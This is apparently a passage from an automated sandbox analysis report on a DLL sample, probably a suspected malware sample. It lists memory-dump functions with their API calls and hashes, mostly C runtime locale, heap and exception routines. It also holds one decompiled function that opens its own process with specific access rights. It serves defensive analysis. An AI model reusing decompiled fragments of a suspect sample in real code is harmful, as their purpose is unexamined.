              • Instruction Fuzzy Hash: B1115B76340705ABD710DAE9CC80DDB77FCAF68A047104458E905D7240EBA8ED4A97A1
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              APIs
              • ___crtGetLocaleInfoA.LIBCMT ref: 6E223C12
                • Part of subcall function 6E22FA7E: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E22FA8A
                • Part of subcall function 6E22FA7E: __crtGetLocaleInfoA_stat.LIBCMT ref: 6E22FA9F
              • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 6E223C24
              • ___crtGetLocaleInfoA.LIBCMT ref: 6E223C44
              • ___crtGetLocaleInfoA.LIBCMT ref: 6E223C86
              • __calloc_crt.LIBCMT ref: 6E223C59
                • Part of subcall function 6E223A00: __calloc_impl.LIBCMT ref: 6E223A0F
              • __calloc_crt.LIBCMT ref: 6E223C9B
              • _free.LIBCMT ref: 6E223CB3
              • _free.LIBCMT ref: 6E223CF3
              • __calloc_crt.LIBCMT ref: 6E223D1D
              • _free.LIBCMT ref: 6E223D43
              • __invoke_watson.LIBCMT ref: 6E223D93
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: Locale$Info$___crt__calloc_crt_free$A_statErrorLastUpdateUpdate::___calloc_impl__crt__invoke_watson
              • String ID:
              • API String ID: 1731282729-0
              • Opcode ID: 890426af0763d8a41b789f8a4739d93e799ac05cf50d20d97ab1d572d7c9b804
              • Instruction ID: 91a273b7995749c39333252be1b6a8c94678e58d70d3b27ba582f3c2f350ef32
              • Opcode Fuzzy Hash: 890426af0763d8a41b789f8a4739d93e799ac05cf50d20d97ab1d572d7c9b804
              • Instruction Fuzzy Hash: FA515FB990421FAFEB649FA58D49BDA7B7EFF04314F1044B5E908A6241EF3289548B60
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • _wcscmp.LIBCMT ref: 6E22E86E
              • _wcscmp.LIBCMT ref: 6E22E87F
              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6E22E89B
              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6E22E8C5
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: InfoLocale_wcscmp
              • String ID:
              • API String ID: 1351282208-0
              • Opcode ID: 27e5bda060de6d18f2e622aa396480e475bb136b80e8be7d726de2fb2209c736
              • Instruction ID: d72f3ebb0ab87946e1b9d78f32fac50a19ea9ced617190429f4e59992035ade0
              • Opcode Fuzzy Hash: 27e5bda060de6d18f2e622aa396480e475bb136b80e8be7d726de2fb2209c736
              • Instruction Fuzzy Hash: F501843525851EAFFB429EE8C845ECA37DEAF05656B008435F944DA1A0E730D580E7D2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RtlDecodePointer.NTDLL(?), ref: 6E2235A7
              • _free.LIBCMT ref: 6E2235C0
                • Part of subcall function 6E223DA6: HeapFree.KERNEL32(00000000,00000000,?,6E22206D,00000000,00000001,00000000,?,?,?,6E21D916,6E21B7A5), ref: 6E223DBA
                • Part of subcall function 6E223DA6: GetLastError.KERNEL32(00000000,?,6E22206D,00000000,00000001,00000000,?,?,?,6E21D916,6E21B7A5), ref: 6E223DCC
              • _free.LIBCMT ref: 6E2235D3
              • _free.LIBCMT ref: 6E2235F1
              • _free.LIBCMT ref: 6E223603
              • _free.LIBCMT ref: 6E223614
              • _free.LIBCMT ref: 6E22361F
              • _free.LIBCMT ref: 6E223643
              • RtlEncodePointer.NTDLL(6E295980), ref: 6E22364A
              • _free.LIBCMT ref: 6E22365F
              • _free.LIBCMT ref: 6E223675
              • _free.LIBCMT ref: 6E22369D
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
              • String ID: F)n
              • API String ID: 3064303923-455955172
              • Opcode ID: b351bee342eaa5ea5cf40aa6b6976d5ef99be533ffdf976dcf5212443e0daf59
              • Instruction ID: f2092f26939f6fe976f8b0e4216b1d686dbad9eae048902615ada0eeb8d0289f
              • Opcode Fuzzy Hash: b351bee342eaa5ea5cf40aa6b6976d5ef99be533ffdf976dcf5212443e0daf59
              • Instruction Fuzzy Hash: 4221A039A4692BCFFFA04FA6DD4C96977ABBB46736300153AE51897300C7384841CAF0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
              • String ID:
              • API String ID: 1442030790-0
              • Opcode ID: 5f1bf0b6b12f42165af58525b084f009b1f80eeb4bf0aaef3849c797b4d487a4
              • Instruction ID: 58fce7c5e625cfd19c7794b453747821f3fc3bb7f5cd63cc94dbe1269efbc1a9
              • Opcode Fuzzy Hash: 5f1bf0b6b12f42165af58525b084f009b1f80eeb4bf0aaef3849c797b4d487a4
              • Instruction Fuzzy Hash: E521C27F52861AEFE7615FE5CC05E8A7BEBFF46754B204C39E44456260EB3384008690
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
              • String ID:
              • API String ID: 3432600739-0
              • Opcode ID: 1a8b89061ca08546a97338d745b169eb0ad3987c8d74a91615036877f3643dcd
              • Instruction ID: 4a74aaa7999ea2dfe95c970c909eeb090bc5f55156b2ac6bfb2ceaba66c413d7
              • Opcode Fuzzy Hash: 1a8b89061ca08546a97338d745b169eb0ad3987c8d74a91615036877f3643dcd
              • Instruction Fuzzy Hash: 2D41EEBA81420EAFDB009FE59880BCD77EBBF04319F104839F91597180DB779686DB61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • __init_pointers.LIBCMT ref: 6E22212F
                • Part of subcall function 6E2237EA: RtlEncodePointer.NTDLL(00000000), ref: 6E2237ED
                • Part of subcall function 6E2237EA: __initp_misc_winsig.LIBCMT ref: 6E223808
                • Part of subcall function 6E2237EA: GetModuleHandleW.KERNEL32(6E1C30D8,?,6E293798,00000008,6E294008,6E29354C,?,00000001), ref: 6E225B99
              • __mtinitlocks.LIBCMT ref: 6E222134
              • __mtterm.LIBCMT ref: 6E22213D
                • Part of subcall function 6E2221A5: RtlDeleteCriticalSection.NTDLL(?), ref: 6E228218
                • Part of subcall function 6E2221A5: _free.LIBCMT ref: 6E22821F
                • Part of subcall function 6E2221A5: RtlDeleteCriticalSection.NTDLL(6E294D40), ref: 6E228241
              • __calloc_crt.LIBCMT ref: 6E222162
              • __initptd.LIBCMT ref: 6E222184
              • GetCurrentThreadId.KERNEL32 ref: 6E22218B
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
              • String ID:
              • API String ID: 1551663144-0
              • Opcode ID: 3b49f610130fdca1db4e76172ce1afc97b02853db3e76f9baa70e81cbd1daa23
              • Instruction ID: d565c042dde21decc911553a71a6fc81b6dc8b151065f299e509da5fd8bd05a5
              • Opcode Fuzzy Hash: 3b49f610130fdca1db4e76172ce1afc97b02853db3e76f9baa70e81cbd1daa23
              • Instruction Fuzzy Hash: F0F0F67702D71B2FF664AAF46C05ACB2A8BAF02639B200A39F564DA0D1FF128041D160
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FindFirstChangeNotificationA.KERNEL32 ref: 6E23EB7D
              • GetCurrentDirectoryA.KERNEL32(00000404,6E2A9BC0), ref: 6E23EBDF
              • GetEnvironmentVariableA.KERNEL32(6E1C8140,6E2AA1E8,00000404), ref: 6E23ECD9
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: ChangeCurrentDirectoryEnvironmentFindFirstNotificationVariable
              • String ID: 3$PR)n
              • API String ID: 2016254915-1293188012
              • Opcode ID: 6434ee782b76773d494697785d01e23527eadc4414a76b44a4d68fde20b57dc6
              • Instruction ID: f6d5d697a6d37fcb63d56ea0a24ecb194e354d0057a3c764feded77284319f67
              • Opcode Fuzzy Hash: 6434ee782b76773d494697785d01e23527eadc4414a76b44a4d68fde20b57dc6
              • Instruction Fuzzy Hash: D471AEB1B847168FDB04CFAAC89861977A3FB8631AF549A3ED81587344D3749808CF61
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: _wcsnlen
              • String ID: U
              • API String ID: 3628947076-3372436214
              • Opcode ID: a130cd58009ec03e88894f727ffc434a8ab414368446440ebed0c4a75e4c71a3
              • Instruction ID: 706025769fbe77e4a28b6b92e08f17182ff787be2a26e52ff9da0bbcc658df2e
              • Opcode Fuzzy Hash: a130cd58009ec03e88894f727ffc434a8ab414368446440ebed0c4a75e4c71a3
              • Instruction Fuzzy Hash: E6213BB362810DAFEB448AE9AC45FFA33AEDB45761F504535F908C7180FB73DA108690
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • _malloc.LIBCMT ref: 6E22F774
                • Part of subcall function 6E224E76: __FF_MSGBANNER.LIBCMT ref: 6E224E8D
                • Part of subcall function 6E224E76: __NMSG_WRITE.LIBCMT ref: 6E224E94
                • Part of subcall function 6E224E76: RtlAllocateHeap.NTDLL(6E2959B8,00000000,00000001), ref: 6E224EB9
              • _free.LIBCMT ref: 6E22F787
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: AllocateHeap_free_malloc
              • String ID:
              • API String ID: 1020059152-0
              • Opcode ID: a21a2f0f7ca1c9cbce24ee946850e3ce78982631e02ebd316f37c6ad7520694d
              • Instruction ID: 2a10e2b7a5c32affc8b1445ad24871128c017ce3979bc7d6f16a9dc870975e25
              • Opcode Fuzzy Hash: a21a2f0f7ca1c9cbce24ee946850e3ce78982631e02ebd316f37c6ad7520694d
              • Instruction Fuzzy Hash: D011CA3691461F9FFF611FF89854A8B37DBAF05379F304936F908AA180EB74848086E4
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 6E221FF5: __getptd_noexit.LIBCMT ref: 6E221FF6
                • Part of subcall function 6E221FF5: __amsg_exit.LIBCMT ref: 6E222003
              • __amsg_exit.LIBCMT ref: 6E22195F
              • __lock.LIBCMT ref: 6E22196F
              • _free.LIBCMT ref: 6E22199C
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: __amsg_exit$__getptd_noexit__lock_free
              • String ID: F)n
              • API String ID: 3054295789-455955172
              • Opcode ID: bb6dae0eb77d9adf97ddc62b227f6f3178c5c820fc4a1a78fe88f3b0a8369f1e
              • Instruction ID: 28a04ea06208bf68ecd72fe695767930c2cb6358b5aa497ff02029938896fdf2
              • Opcode Fuzzy Hash: bb6dae0eb77d9adf97ddc62b227f6f3178c5c820fc4a1a78fe88f3b0a8369f1e
              • Instruction Fuzzy Hash: 2A11A535D01A6F9FCB509FEA8440F8DB3E67F05B21B150529D474A7280CB395986CFD5
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6E23CB95
              • __isleadbyte_l.LIBCMT ref: 6E23CBC3
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E23CBF1
              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,00000000,00000000), ref: 6E23CC27
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
              • String ID:
              • API String ID: 3058430110-0
              • Opcode ID: 1909cc19a61a1a17949f628dfebf427fb23bf0321f6290863e8d73ee3b8edeb9
              • Instruction ID: a1145c35da36b566790ba9e4a56cec1f720db70330db6cdb6ebd5ff284bac845
              • Opcode Fuzzy Hash: 1909cc19a61a1a17949f628dfebf427fb23bf0321f6290863e8d73ee3b8edeb9
              • Instruction Fuzzy Hash: 7831057050427FAFDB118EB5C846BAA7BA7FF01721F254829E4618B190E731D450DFA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • ___BuildCatchObject.LIBCMT ref: 6E22633B
                • Part of subcall function 6E226A30: ___BuildCatchObjectHelper.LIBCMT ref: 6E226A62
                • Part of subcall function 6E226A30: ___AdjustPointer.LIBCMT ref: 6E226A79
              • _UnwindNestedFrames.LIBCMT ref: 6E226352
              • ___FrameUnwindToState.LIBCMT ref: 6E226364
              • CallCatchBlock.LIBCMT ref: 6E226388
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
              • String ID:
              • API String ID: 2901542994-0
              • Opcode ID: f043bd799ec794dcdbd96a67b851ac0f7d1579d04b3c6502d4da18ff498105f8
              • Instruction ID: ee0afe558ddf0337d7cfce0a731354002d2884e81c01789a62bf030c85e24bd3
              • Opcode Fuzzy Hash: f043bd799ec794dcdbd96a67b851ac0f7d1579d04b3c6502d4da18ff498105f8
              • Instruction Fuzzy Hash: B301173201014DEFCF025F95DC40EDA7BBAFF48B54F058424FA1866120C372E5619FA0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.464458937.000000006E1CE000.00000020.00020000.sdmp, Offset: 6E1CE000, based on PE: false
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
              • Instruction ID: 494249a2afee8a6f63858aff78b1f8147ea0c4a96904d87ad01eff588c94aa35
              • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
              • Instruction Fuzzy Hash: BF01333644828EBFCF125EC4CC11DEE3F27BB19355B458925FE28981A0C336D6B1AB81
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E6E1C1F10() {
              				void* _t1;
              				long _t3;
              				void* _t4;
              				long _t5;
              				void* _t6;
              				intOrPtr _t8;
              
              				_t8 =  *0x6e1c41b0;
              				_t1 = CreateEventA(0, 1, 0, 0);
              				 *0x6e1c41bc = _t1;
              				if(_t1 == 0) {
              					return GetLastError();
              				}
              				_t3 = GetVersion();
              				if(_t3 <= 5) {
              					_t4 = 0x32;
              					return _t4;
              				} else {
              					 *0x6e1c41ac = _t3;
              					_t5 = GetCurrentProcessId();
              					 *0x6e1c41a8 = _t5;
              					 *0x6e1c41b0 = _t8;
              					_t6 = OpenProcess(0x10047a, 0, _t5);
              					 *0x6e1c41a4 = _t6;
              					if(_t6 == 0) {
              						 *0x6e1c41a4 =  *0x6e1c41a4 | 0xffffffff;
              					}
              					return 0;
              				}
              			}









              0x6e1c1f11
              0x6e1c1f1f
              0x6e1c1f27
              0x6e1c1f2c
              0x6e1c1f76
              0x6e1c1f76
              0x6e1c1f2e
              0x6e1c1f36
              0x6e1c1f72
              0x6e1c1f74
              0x6e1c1f38
              0x6e1c1f38
              0x6e1c1f3d
              0x6e1c1f4b
              0x6e1c1f50
              0x6e1c1f56
              0x6e1c1f5e
              0x6e1c1f63
              0x6e1c1f65
              0x6e1c1f65
              0x6e1c1f6f
              0x6e1c1f6f

              APIs
              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E1C1C8E,74B063F0,00000000), ref: 6E1C1F1F
              • GetVersion.KERNEL32 ref: 6E1C1F2E
              • GetCurrentProcessId.KERNEL32 ref: 6E1C1F3D
              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E1C1F56
              Memory Dump Source
              • Source File: 00000004.00000002.464370072.000000006E1C1000.00000020.00020000.sdmp, Offset: 6E1C0000, based on PE: true
              • Associated: 00000004.00000002.464353477.000000006E1C0000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464387717.000000006E1C3000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.464410196.000000006E1C5000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.464423958.000000006E1C6000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Process$CreateCurrentEventOpenVersion
              • String ID:
              • API String ID: 845504543-0
              • Opcode ID: 40b5d2db281a1f08b3abba376e25a0ec80b613e9ee2c174c19d5b12452c20036
              • Instruction ID: 51aa3f2096f753addaedce12120e78271127343c77df0434785102bce9e58d26
              • Opcode Fuzzy Hash: 40b5d2db281a1f08b3abba376e25a0ec80b613e9ee2c174c19d5b12452c20036
              • Instruction Fuzzy Hash: ADF01D72688A10AFEF509FA9A81E7893FB4B72BF11F108059F199C91C0D3786447BB45
              Uniqueness

              Uniqueness Score: -1.00%